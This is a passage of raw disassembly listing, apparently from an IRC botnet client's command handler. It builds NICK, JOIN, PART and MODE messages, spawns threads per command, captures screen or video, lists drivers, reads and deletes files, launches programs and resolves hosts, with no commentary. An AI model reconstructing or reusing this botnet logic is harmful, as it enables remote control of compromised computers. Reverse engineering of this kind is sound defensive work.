loc_409144: ; CODE XREF: sub_40274D+69DC�j
cmp [ebp+4Ch+var_1EFC], ebx
jz short loc_40913C
jmp loc_409214
; ---------------------------------------------------------------------------
loc_409151: ; CODE XREF: sub_40274D+47A3�j
; sub_40274D+47BA�j
push 7Fh ; Count
push [ebp+4Ch+var_8] ; Source
lea eax, [ebp+4Ch+var_23B0]
push eax ; Dest
call _strncpy
push 7Fh ; Count
lea eax, [ebp+4Ch+var_2330]
push edi ; Source
push eax ; Dest
call _strncpy
push 7Fh ; Count
push [ebp+4Ch+Format] ; Source
lea eax, [ebp+4Ch+var_22B0]
push eax ; Dest
call _strncpy
mov eax, [ebp+4Ch+var_4]
mov esi, [ebp+4Ch+arg_4]
push edi
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_222C], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_2228], eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42D240 ; "-"
push eax ; Dest
mov [ebp+4Ch+var_23B4], esi
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 11h ; int
push eax ; Source
call sub_40AE85
add esp, 40h
mov [ebp+4Ch+var_2230], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_23B4]
push eax
push offset sub_416A7E
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_2230]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_409239
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset asc_42D204 ; "-"
loc_409205: ; CODE XREF: sub_40274D+69EA�j
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_409214: ; CODE XREF: sub_40274D+69FF�j
; sub_40274D+6AF4�j
cmp [ebp+4Ch+var_C], ebx
jnz loc_404A79
push ebx
push [ebp+4Ch+var_4]
lea eax, [ebp+4Ch+Dst]
push eax
push [ebp+4Ch+Format]
push esi
jmp loc_404A71
; ---------------------------------------------------------------------------
loc_409231: ; CODE XREF: sub_40274D+6AF2�j
push 32h
call ds:dword_42B014 ; Sleep
loc_409239: ; CODE XREF: sub_40274D+6AAA�j
cmp [ebp+4Ch+var_2224], ebx
jz short loc_409231
jmp short loc_409214
; ---------------------------------------------------------------------------
loc_409243: ; CODE XREF: sub_40274D+4775�j
; sub_40274D+478C�j
push edi
lea eax, [ebp+4Ch+Dst]
push offset aPartS_0 ; "PART %s"
push eax ; Dest
call _sprintf
push [ebp+4Ch+var_8] ; Str
call j__atol
add esp, 10h
loc_409260: ; CODE XREF: sub_40274D+6B55�j
test eax, eax
jle loc_404979
push [ebp+4Ch+var_8] ; Str
call j__atol
cmp eax, 400h
pop ecx
jge loc_404979
jmp loc_409DC3
; ---------------------------------------------------------------------------
loc_409281: ; CODE XREF: sub_40274D+4747�j
; sub_40274D+475E�j
push [ebp+esi+4Ch+var_98]
lea eax, [ebp+4Ch+Dst]
push edi
push offset aJoinSS_0 ; "JOIN %s %s"
push eax ; Dest
call _sprintf
push [ebp+4Ch+var_8] ; Str
call j__atol
add esp, 14h
jmp short loc_409260
; ---------------------------------------------------------------------------
loc_4092A4: ; CODE XREF: sub_40274D+4719�j
; sub_40274D+4730�j
push edi
lea eax, [ebp+4Ch+Dst]
push offset aNickS_0 ; "NICK %s"
push eax ; Dest
call _sprintf
mov esi, [ebp+4Ch+var_8]
push esi ; Str
call j__atol
add esp, 10h
test eax, eax
jle loc_404979
push esi ; Str
call j__atol
cmp eax, 400h
pop ecx
jge loc_404979
lea eax, [ebp+4Ch+Dst]
push eax ; Args
push offset aS_0 ; "%s\r\n"
push esi ; Str
call j__atol
imul eax, 234h
pop ecx
push dword_4444F4[eax] ; int
call sub_4011F5
push edi
push esi
push offset dword_42D1CC
jmp loc_409FB1
; ---------------------------------------------------------------------------
loc_40930C: ; CODE XREF: sub_40274D+46EB�j
; sub_40274D+4702�j
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push edi ; SubStr
push [ebp+4Ch+var_18] ; Str
call _strstr
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jz short loc_40933B
push esi
lea eax, [ebp+4Ch+Dst]
push offset aModeS ; "MODE %s"
push eax ; Dest
call _sprintf
add esp, 0Ch
loc_40933B: ; CODE XREF: sub_40274D+6BD7�j
mov edi, [ebp+4Ch+var_8]
push edi ; Str
call j__atol
test eax, eax
pop ecx
jle loc_404979
push edi ; Str
call j__atol
cmp eax, 400h
pop ecx
jge loc_404979
lea eax, [ebp+4Ch+Dst]
push eax ; Args
push offset aS_0 ; "%s\r\n"
push edi ; Str
call j__atol
imul eax, 234h
pop ecx
push dword_4444F4[eax] ; int
call sub_4011F5
push esi
push edi
push offset dword_42D1A8
jmp loc_409FB1
; ---------------------------------------------------------------------------
loc_40938F: ; CODE XREF: sub_40274D+46BD�j
; sub_40274D+46D4�j
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push edi ; SubStr
push [ebp+4Ch+var_18] ; Str
call _strstr
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jz loc_404979
mov edi, [ebp+4Ch+var_8]
push edi ; Str
call j__atol
test eax, eax
pop ecx
jle loc_404979
push edi ; Str
call j__atol
cmp eax, 400h
pop ecx
jge loc_404979
push esi ; Args
push offset aS_0 ; "%s\r\n"
push edi ; Str
call j__atol
imul eax, 234h
pop ecx
push dword_4444F4[eax] ; int
call sub_4011F5
push esi
push edi
push offset dword_42D18C
jmp loc_409FB1
; ---------------------------------------------------------------------------
loc_4093FB: ; CODE XREF: sub_40274D+468F�j
; sub_40274D+46A6�j
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push [ebp+4Ch+var_8] ; SubStr
push [ebp+4Ch+var_18] ; Str
call _strstr
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jz loc_404979
push esi ; Args
push offset aModeS_0 ; "MODE %s\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
push esi
push offset unk_42D164
jmp loc_409FD6
; ---------------------------------------------------------------------------
loc_409434: ; CODE XREF: sub_40274D+4661�j
; sub_40274D+4678�j
push dword ptr [ebp+4Ch+Args] ; Str2
push offset a332 ; "332"
call _strcmp
test eax, eax
pop ecx
pop ecx
jz loc_402B92
push edi ; Args
push offset aPartS_1 ; "PART %s\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
push [ebp+4Ch+var_8] ; Str
call j__atol
imul eax, 3E8h
add esp, 10h
push eax
call ds:dword_42B014 ; Sleep
push [ebp+esi+4Ch+var_98]
push edi ; Args
push offset aJoinSS ; "JOIN %s %s\r\n"
push [ebp+4Ch+arg_4] ; int
call sub_4011F5
push offset dword_42D144
call sub_417D70
jmp loc_409FDB
; ---------------------------------------------------------------------------
loc_409492: ; CODE XREF: sub_40274D+4633�j
; sub_40274D+464A�j
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push [ebp+4Ch+var_8] ; Str
call _strlen
push [ebp+4Ch+var_10] ; Str
mov esi, eax
call _strlen
add eax, [ebp+4Ch+var_18]
push edi ; SubStr
lea eax, [eax+esi+2]
push eax ; Str
call _strstr
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_404979
push esi
lea eax, [ebp+4Ch+Dst]
push offset dword_42D87C ; Format
push eax ; Dest
call _sprintf
push ebx ; int
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+var_8] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
push esi
push [ebp+4Ch+var_8] ; Args
push offset asc_42D128 ; "-"
call sub_417DE4
add esp, 2Ch
jmp loc_404979
; ---------------------------------------------------------------------------
loc_409504: ; CODE XREF: sub_40274D+4605�j
; sub_40274D+461C�j
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push [ebp+4Ch+var_8] ; Str
call _strlen
push [ebp+4Ch+var_10] ; Str
mov esi, eax
call _strlen
add eax, [ebp+4Ch+var_18]
push edi ; SubStr
lea eax, [eax+esi+2]
push eax ; Str
call _strstr
mov esi, eax
add esp, 10h
cmp esi, ebx
jz loc_404979
push ebx ; int
push ebx ; int
push esi ; int
push [ebp+4Ch+var_8] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
push esi
push [ebp+4Ch+var_8] ; Args
push offset asc_42D108 ; "-"
call sub_417DE4
add esp, 20h
jmp loc_404979
; ---------------------------------------------------------------------------
loc_40955E: ; CODE XREF: sub_40274D+45D7�j
; sub_40274D+45EE�j
cmp [ebp+4Ch+var_18], ebx
jz loc_402B92
push edi ; SubStr
push [ebp+4Ch+var_18] ; Str
call _strstr
cmp eax, ebx
pop ecx
pop ecx
jz loc_402B92
push eax ; int
push [ebp+4Ch+var_8] ; Str2
call sub_417C78
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+Dst]
push offset asc_42D0E8 ; "-"
push eax ; Dest
call _sprintf
add esp, 14h
jmp loc_404A5B
; ---------------------------------------------------------------------------
loc_40959F: ; CODE XREF: sub_40274D+45A9�j
; sub_40274D+45C0�j
push edi ; int
push [ebp+4Ch+var_8] ; int
push [ebp+4Ch+var_4] ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_41B065
loc_4095B1: ; CODE XREF: sub_40274D+2435�j
add esp, 14h
jmp loc_402B92
; ---------------------------------------------------------------------------
loc_4095B9: ; CODE XREF: sub_40274D+456E�j
; sub_40274D+4583�j
push [ebp+4Ch+var_8] ; SubStr
push [ebp+4Ch+arg_1C] ; Str
call _strstr
test eax, eax
pop ecx
pop ecx
jz loc_404979
mov esi, [ebp+esi+4Ch+Format]
cmp esi, ebx
jz short loc_409648
push esi ; SubStr
push [ebp+4Ch+var_18] ; Str
call _strstr
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
lea eax, [ebp+4Ch+Dst]
jz short loc_409636
push esi
push [ebp+4Ch+Format]
push dword ptr [ebp+4Ch+Args]
push [ebp+4Ch+Str2]
push offset aSSSS ; "%s %s %s :%s"
push eax ; Dest
call _sprintf
push 1FFh ; Count
lea eax, [ebp+4Ch+Dst]
push eax ; Source
push [ebp+4Ch+arg_0] ; Dest
call _strncpy
push esi
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+Dst]
push offset asc_42D0C0 ; "-"
push eax ; Dest
call _sprintf
add esp, 34h
inc [ebp+4Ch+arg_24]
jmp loc_4099EE
; ---------------------------------------------------------------------------
loc_409636: ; CODE XREF: sub_40274D+6E9E�j
push offset asc_42D090 ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
jmp loc_4099EE
; ---------------------------------------------------------------------------
loc_409648: ; CODE XREF: sub_40274D+6E87�j
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push [ebp+4Ch+arg_4]
push [ebp+4Ch+arg_1C]
push eax
call sub_41D9E5
add esp, 0Ch
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+Dst]
push offset asc_42D074 ; "-"
push 200h ; Count
push eax ; Dest
call __snprintf
add esp, 24h
jmp loc_4099EE
; ---------------------------------------------------------------------------
loc_40968E: ; CODE XREF: sub_40274D+4544�j
; sub_40274D+4559�j
push offset aScreen ; "screen"
push [ebp+4Ch+var_8] ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_4096E6
mov edi, [ebp+esi+4Ch+Format]
cmp edi, ebx
jz short loc_4096D3
push edi
call sub_417F75
cmp eax, 1
pop ecx
lea eax, [ebp+4Ch+Dst]
jnz short loc_4096CC
push edi
push offset asc_42D040 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_4096E6
; ---------------------------------------------------------------------------
loc_4096CC: ; CODE XREF: sub_40274D+6F6C�j
push offset unk_42D010
jmp short loc_4096DE
; ---------------------------------------------------------------------------
loc_4096D3: ; CODE XREF: sub_40274D+6F5A�j
push offset asc_42CFD4 ; "-"
lea eax, [ebp+4Ch+Dst]
loc_4096DE: ; CODE XREF: sub_40274D+6F84�j
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_4096E6: ; CODE XREF: sub_40274D+6F52�j
; sub_40274D+6F7D�j
push offset aDrivers ; "drivers"
push [ebp+4Ch+var_8] ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_409770
xor edi, edi
loc_4096FB: ; CODE XREF: sub_40274D+700E�j
push 1FFh
lea eax, [ebp+4Ch+var_5400]
push eax
push 0FFh
lea eax, [ebp+4Ch+var_4EF8]
push eax
push edi
call dword_44419C
test eax, eax
jz short loc_409757
lea eax, [ebp+4Ch+var_5400]
push eax
lea eax, [ebp+4Ch+var_4EF8]
push eax
push edi
lea eax, [ebp+4Ch+var_5D90]
push offset asc_42CFA4 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+var_5D90]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 28h
loc_409757: ; CODE XREF: sub_40274D+6FCF�j
inc edi
cmp edi, 0Ah
jl short loc_4096FB
lea eax, [ebp+4Ch+Dst]
push offset asc_42CF7C ; "-"
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_409770: ; CODE XREF: sub_40274D+6FAA�j
push offset aFrame ; "frame"
push [ebp+4Ch+var_8] ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz short loc_4097FE
cmp [ebp+esi+4Ch+Format], ebx
jz short loc_4097EB
cmp [ebp+esi+4Ch+var_98], ebx
jz short loc_4097EB
mov edi, [ebp+esi+4Ch+var_94]
cmp edi, ebx
jz short loc_4097EB
mov eax, [ebp+esi+4Ch+var_90]
cmp eax, ebx
jz short loc_4097EB
push eax ; Str
call j__atol
pop ecx
push eax
push edi ; Str
call j__atol
pop ecx
push eax
push [ebp+esi+4Ch+var_98] ; Str
call j__atol
pop ecx
push eax
push [ebp+esi+4Ch+Format]
call sub_4181B2
add esp, 10h
test eax, eax
lea eax, [ebp+4Ch+Dst]
jnz short loc_4097E4
push [ebp+esi+4Ch+Format]
push offset asc_42CF48 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_4097FE
; ---------------------------------------------------------------------------
loc_4097E4: ; CODE XREF: sub_40274D+7081�j
push offset unk_42CF14
jmp short loc_4097F6
; ---------------------------------------------------------------------------
loc_4097EB: ; CODE XREF: sub_40274D+703A�j
; sub_40274D+7040�j ...
push offset asc_42CEDC ; "-"
lea eax, [ebp+4Ch+Dst]
loc_4097F6: ; CODE XREF: sub_40274D+709C�j
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_4097FE: ; CODE XREF: sub_40274D+7034�j
; sub_40274D+7095�j
push offset aVideo ; "video"
push [ebp+4Ch+var_8] ; Str1
call _strcmp
test eax, eax
pop ecx
pop ecx
jnz loc_4099D0
mov eax, [ebp+esi+4Ch+Format]
cmp eax, ebx
mov [ebp+4Ch+var_20], eax
jz short loc_40989F
mov eax, [ebp+esi+4Ch+var_98]
cmp eax, ebx
mov [ebp+4Ch+arg_0], eax
jz short loc_40989F
mov eax, [ebp+esi+4Ch+var_94]
cmp eax, ebx
mov [ebp+4Ch+var_14], eax
jz short loc_40989F
mov edi, [ebp+esi+4Ch+var_90]
cmp edi, ebx
jz short loc_40989F
mov esi, [ebp+esi+4Ch+var_8C]
cmp esi, ebx
jz short loc_40989F
push esi ; Str
call j__atol
pop ecx
push eax
push edi ; Str
call j__atol
pop ecx
push eax
push [ebp+4Ch+var_14] ; Str
call j__atol
pop ecx
push eax
push [ebp+4Ch+arg_0] ; Str
call j__atol
pop ecx
push eax
push [ebp+4Ch+var_20]
call sub_4183AB
add esp, 14h
test eax, eax
lea eax, [ebp+4Ch+Dst]
jnz short loc_409895
push [ebp+4Ch+var_20]
push offset asc_42CEA8 ; "-"
loc_409887: ; CODE XREF: sub_40274D+6931�j
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_4099D0
; ---------------------------------------------------------------------------
loc_409895: ; CODE XREF: sub_40274D+7130�j
push offset unk_42CE68
jmp loc_4099C8
; ---------------------------------------------------------------------------
loc_40989F: ; CODE XREF: sub_40274D+70D1�j
; sub_40274D+70DC�j ...
push offset unk_42CE24
lea eax, [ebp+4Ch+Dst]
jmp loc_4099C8
; ---------------------------------------------------------------------------
loc_4098AF: ; CODE XREF: sub_40274D+3D58�j
; sub_40274D+3D6D�j
push offset aR ; "r"
push [ebp+4Ch+var_8] ; char *
call _fopen
mov edi, eax
cmp edi, ebx
pop ecx
pop ecx
jz short loc_40992A
push edi ; File
mov esi, 200h
lea eax, [ebp+4Ch+Dst]
push esi ; MaxCount
push eax ; Buf
call _fgets
add esp, 0Ch
jmp short loc_409904
; ---------------------------------------------------------------------------
loc_4098DC: ; CODE XREF: sub_40274D+71B9�j
push 1 ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
push edi ; File
lea eax, [ebp+4Ch+Dst]
push esi ; MaxCount
push eax ; Buf
call _fgets
add esp, 20h
loc_409904: ; CODE XREF: sub_40274D+718D�j
test eax, eax
jnz short loc_4098DC
push edi ; File
call _fclose
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+Dst]
push offset asc_42CE00 ; "-"
push eax ; Dest
call _sprintf
add esp, 10h
jmp loc_406C6B
; ---------------------------------------------------------------------------
loc_40992A: ; CODE XREF: sub_40274D+7175�j
push [ebp+4Ch+var_8]
push offset unk_42CDDC
jmp loc_4076D4
; ---------------------------------------------------------------------------
loc_409937: ; CODE XREF: sub_40274D+3D2E�j
; sub_40274D+3D43�j
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push [ebp+4Ch+var_8] ; SubStr
push [ebp+4Ch+var_18] ; Str
call _strstr
mov esi, eax
cmp esi, ebx
pop ecx
pop ecx
jz loc_404979
push offset asc_42CDD8 ; "\n"
push esi ; Dest
call _strcat
push esi ; Str
call sub_41C7BD
add esp, 0Ch
test eax, eax
lea eax, [ebp+4Ch+Dst]
jnz short loc_40997C
push offset unk_42CDAC
jmp short loc_4099C8
; ---------------------------------------------------------------------------
loc_40997C: ; CODE XREF: sub_40274D+7226�j
push esi
push offset asc_42CD94 ; "-"
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp short loc_4099EE
; ---------------------------------------------------------------------------
loc_40998D: ; CODE XREF: sub_40274D+3D04�j
; sub_40274D+3D19�j
cmp [ebp+4Ch+var_18], ebx
jz loc_404979
push [ebp+4Ch+var_8] ; SubStr
push [ebp+4Ch+var_18] ; Str
call _strstr
cmp eax, ebx
pop ecx
pop ecx
jz loc_404979
push eax ; Format
call sub_41AD95
test eax, eax
pop ecx
lea eax, [ebp+4Ch+Dst]
jnz short loc_4099C3
push offset unk_42CD74
jmp short loc_4099C8
; ---------------------------------------------------------------------------
loc_4099C3: ; CODE XREF: sub_40274D+726D�j
push offset asc_42CD58 ; "-"
loc_4099C8: ; CODE XREF: sub_40274D+714D�j
; sub_40274D+715D�j ...
push eax ; Dest
call _sprintf
pop ecx
pop ecx
loc_4099D0: ; CODE XREF: sub_40274D+70C2�j
; sub_40274D+7143�j
cmp [ebp+4Ch+var_C], ebx
jnz short loc_4099EE
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 14h
loc_4099EE: ; CODE XREF: sub_40274D+6EE4�j
; sub_40274D+6EF6�j ...
lea eax, [ebp+4Ch+Dst]
push eax
call sub_417D70
pop ecx
jmp loc_404979
; ---------------------------------------------------------------------------
loc_409A00: ; CODE XREF: sub_40274D+3CDA�j
; sub_40274D+3CEF�j
push 7Fh ; Count
push [ebp+4Ch+var_8] ; Source
lea eax, [ebp+4Ch+var_221C]
push eax ; Dest
call _strncpy
mov esi, [ebp+esi+4Ch+Format]
add esp, 0Ch
cmp esi, ebx
jz short loc_409A2E
push 7Fh ; Count
lea eax, [ebp+4Ch+var_219C]
push esi ; Source
push eax ; Dest
call _strncpy
add esp, 0Ch
loc_409A2E: ; CODE XREF: sub_40274D+72CD�j
push 7Fh ; Count
push [ebp+4Ch+Format] ; Source
lea eax, [ebp+4Ch+var_211C]
push eax ; Dest
call _strncpy
mov eax, [ebp+4Ch+arg_4]
push [ebp+4Ch+var_8]
mov [ebp+4Ch+var_2220], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_2098], eax
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_2094], eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42CD40 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 1Ch ; int
push eax ; Source
call sub_40AE85
add esp, 24h
mov [ebp+4Ch+var_209C], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_2220]
push eax
push offset sub_41DAA1
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_209C]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jnz short loc_409ADD
call ds:dword_42B01C ; RtlGetLastWin32Error
push eax
push offset asc_42CD00 ; "-"
loc_409AC1: ; CODE XREF: sub_40274D+278E�j
lea eax, [ebp+4Ch+Dst]
push eax ; Dest
call _sprintf
add esp, 0Ch
jmp loc_406C6B
; ---------------------------------------------------------------------------
loc_409AD5: ; CODE XREF: sub_40274D+7396�j
push 32h
call ds:dword_42B014 ; Sleep
loc_409ADD: ; CODE XREF: sub_40274D+7366�j
cmp [ebp+4Ch+var_2090], ebx
jz short loc_409AD5
jmp loc_406C6B
; ---------------------------------------------------------------------------
loc_409AEA: ; CODE XREF: sub_40274D+3CB0�j
; sub_40274D+3CC5�j
push ebx ; Source
push [ebp+4Ch+Format] ; int
push [ebp+4Ch+arg_4] ; int
push [ebp+4Ch+var_8] ; int
call sub_412135
push [ebp+4Ch+var_8]
push offset dword_42CCE8
jmp loc_409FB1
; ---------------------------------------------------------------------------
loc_409B06: ; CODE XREF: sub_40274D+3C86�j
; sub_40274D+3C9B�j
push 14h ; Size
lea eax, [ebp+4Ch+var_1D50]
push ebx ; Val
push eax ; Dst
call _memset
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+var_1D3C]
push offset aS ; "%s"
push eax ; Dest
call _sprintf
mov eax, [ebp+4Ch+arg_4]
mov [ebp+4Ch+var_1D58], eax
lea eax, [ebp+4Ch+var_D0]
push eax ; Format
lea eax, [ebp+4Ch+var_1C38]
push 80h ; Count
push eax ; Dest
call __snprintf
mov eax, [ebp+4Ch+var_4]
mov [ebp+4Ch+var_1BB0], eax
mov eax, [ebp+4Ch+var_C]
mov [ebp+4Ch+var_1BAC], eax
lea eax, [ebp+4Ch+var_1C38]
push eax
lea eax, [ebp+4Ch+var_1D3C]
push eax
lea eax, [ebp+4Ch+Dst]
push offset asc_42CCC4 ; "-"
push eax ; Dest
call _sprintf
push ebx ; int
lea eax, [ebp+4Ch+Dst]
push 1Ah ; int
push eax ; Source
call sub_40AE85
add esp, 40h
mov [ebp+4Ch+var_1BB4], eax
lea eax, [ebp+4Ch+var_1C]
push eax
push ebx
lea eax, [ebp+4Ch+var_1D58]
push eax
push offset sub_418956
push ebx
push ebx
call ds:dword_42B03C ; CreateThread
mov ecx, [ebp+4Ch+var_1BB4]
imul ecx, 234h
cmp eax, ebx
mov dword_4444FC[ecx], eax
jz loc_402E72
jmp short loc_409BD0
; ---------------------------------------------------------------------------
loc_409BC8: ; CODE XREF: sub_40274D+7489�j
push 32h
call ds:dword_42B014 ; Sleep
loc_409BD0: ; CODE XREF: sub_40274D+7479�j
cmp [ebp+4Ch+var_1BA8], ebx
jz short loc_409BC8
jmp loc_408D10
; ---------------------------------------------------------------------------
loc_409BDD: ; CODE XREF: sub_40274D+3C5C�j
; sub_40274D+3C71�j
push [ebp+4Ch+var_8]
call ds:dword_42B02C ; DeleteFileA
test eax, eax
jz short loc_409BF4
push [ebp+4Ch+var_8]
push offset dword_42CCA8
jmp short loc_409BFF
; ---------------------------------------------------------------------------
loc_409BF4: ; CODE XREF: sub_40274D+749B�j
push offset dword_42D4B8
call sub_41ACD0
push eax ; Format
loc_409BFF: ; CODE XREF: sub_40274D+74A5�j
lea eax, [ebp+4Ch+Dst]
push 200h ; Count
push eax ; Dest
call __snprintf
loc_409C10: ; CODE XREF: sub_40274D+7595�j
add esp, 10h
jmp loc_406C4D
; ---------------------------------------------------------------------------
loc_409C18: ; CODE XREF: sub_40274D+3C32�j
; sub_40274D+3C47�j
push [ebp+4Ch+var_8] ; Str
call j__atol
push eax
call sub_41C736
xor esi, esi
pop ecx
inc esi
pop ecx
push [ebp+4Ch+var_8]
cmp eax, esi
lea eax, [ebp+4Ch+Dst]
jnz short loc_409C3F
push offset unk_42CC84
jmp short loc_409C44
; ---------------------------------------------------------------------------
loc_409C3F: ; CODE XREF: sub_40274D+74E9�j
push offset asc_42CC54 ; "-"
loc_409C44: ; CODE XREF: sub_40274D+74F0�j
push eax ; Dest
call _sprintf
add esp, 0Ch
cmp [ebp+4Ch+var_C], ebx
jnz loc_406C6E
push ebx ; int
push [ebp+4Ch+var_4] ; int
lea eax, [ebp+4Ch+Dst]
push eax ; int
push [ebp+4Ch+Format] ; Str
push [ebp+4Ch+arg_4] ; int
call sub_40123B
add esp, 14h
jmp loc_406C6E
; ---------------------------------------------------------------------------
loc_409C74: ; CODE XREF: sub_40274D+3C08�j
; sub_40274D+3C1D�j
push ebx ; int
push ebx ; int
push [ebp+4Ch+var_8] ; Str2
push [ebp+4Ch+var_4] ; int
push ebx ; Str
push [ebp+4Ch+arg_4] ; int
call sub_41C444
add esp, 18h
cmp eax, 1
push [ebp+4Ch+var_8]
jnz short loc_409C9A
push offset unk_42CC34
jmp loc_4076D4
; ---------------------------------------------------------------------------
loc_409C9A: ; CODE XREF: sub_40274D+7541�j
push offset unk_42CC04
jmp loc_4076D4
; ---------------------------------------------------------------------------
loc_409CA4: ; CODE XREF: sub_40274D+3BDE�j
; sub_40274D+3BF3�j
mov esi, [ebp+4Ch+var_8]
push esi
call dword_44417C ; inet_addr
cmp eax, 0FFFFFFFFh
mov [ebp+4Ch+var_2DC], eax
jz short loc_409CE7
push 2
push 4
lea eax, [ebp+4Ch+var_2DC]
push eax
call dword_4441FC ; gethostbyaddr
cmp eax, ebx
jz short loc_409D02
push dword ptr [eax]
loc_409CD0: ; CODE XREF: sub_40274D+75B3�j
push esi
lea eax, [ebp+4Ch+Dst]
push offset asc_42CBE4 ; "-"
push eax ; Dest
call _sprintf
jmp loc_409C10
; ---------------------------------------------------------------------------
loc_409CE7: ; CODE XREF: sub_40274D+756A�j
push esi ; Args
call dword_444168 ; gethostbyname
cmp eax, ebx
jz short loc_409D02
mov eax, [eax+0Ch]
mov eax, [eax]
push dword ptr [eax]
call dword_444188 ; inet_ntoa
push eax
jmp short loc_409CD0
; ---------------------------------------------------------------------------
loc_409D02: ; CODE XREF: sub_40274D+757F�j
; sub_40274D+75A3�j
push offset unk_42CBBC
jmp loc_406C3F
; ---------------------------------------------------------------------------
loc_409D0C: ; CODE XREF: sub_40274D+3BB4�j
; sub_40274D+3BC9�j
push 7Fh ; Count
push [ebp+4Ch+var_8] ; Source
push [ebp+4Ch+arg_14] ; Dest
call _strncpy
push [ebp+4Ch+var_8]
lea eax, [ebp+4Ch+Dst]
push offset asc_42CB94 ; "-"
push eax ; Dest
call _sprintf
add esp, 18h
jmp loc_40698D
; ---------------------------------------------------------------------------
loc_409D35: ; CODE XREF: sub_40274D+3B8A�j
; sub_40274D+3B9F�j
push 5
push ebx
push ebx
push [ebp+4Ch+var_8]
push offset aOpen ; "open"
push ebx
call dword_444214
test eax, eax
push [ebp+4Ch+var_8]
jz short loc_409D59
push offset unk_42CB74
jmp loc_4076D4
; ---------------------------------------------------------------------------
loc_409D59: ; CODE XREF: sub_40274D+7600�j
push offset unk_42CB50
jmp loc_4076D4
; ---------------------------------------------------------------------------
loc_409D63: ; CODE XREF: sub_40274D+3B60�j
; sub_40274D+3B75�j
mov eax, [ebp+4Ch+var_8]
mov cl, [eax]
mov byte_43C08C, cl
movsx eax, byte ptr [eax]
push eax
push offset unk_42CB28
jmp loc_40697E
; ---------------------------------------------------------------------------
loc_409D7C: ; CODE XREF: sub_40274D+3B36�j
; sub_40274D+3B4B�j
push [ebp+4Ch+var_8] ; Str
call j__atol
test eax, eax
pop ecx
jle loc_404979
push [ebp+4Ch+var_8] ; Str
call j__atol
cmp eax, 400h
pop ecx
jge loc_404979
push ebx ; Str1
push ebx ; int
lea eax, [ebp+4Ch+SubStr]
push 2 ; int
push eax ; Dest
call sub_40AB83
push eax
lea eax, [ebp+4Ch+Dst]
push offset aNickS_0 ; "NICK %s"
push eax ; Dest
call _sprintf
add esp, 1Ch
loc_409DC3: ; CODE XREF: sub_40274D+6B2F�j
lea eax, [ebp+4Ch+Dst]
push eax ; Args
push offset aS_0 ; "%s\r\n"
push [ebp+4Ch+var_8] ; Str
call j__atol
imul eax, 234h
pop ecx
push dword_4444F4[eax] ; int
call sub_4011F5
loc_409DE9: ; CODE XREF: sub_40274D+28AE�j
; sub_40274D+28C1�j ...
add esp, 0Ch
jmp loc_404979
; ---------------------------------------------------------------------------
loc_409DF1: ; CODE XREF: sub_40274D+3B0C�j
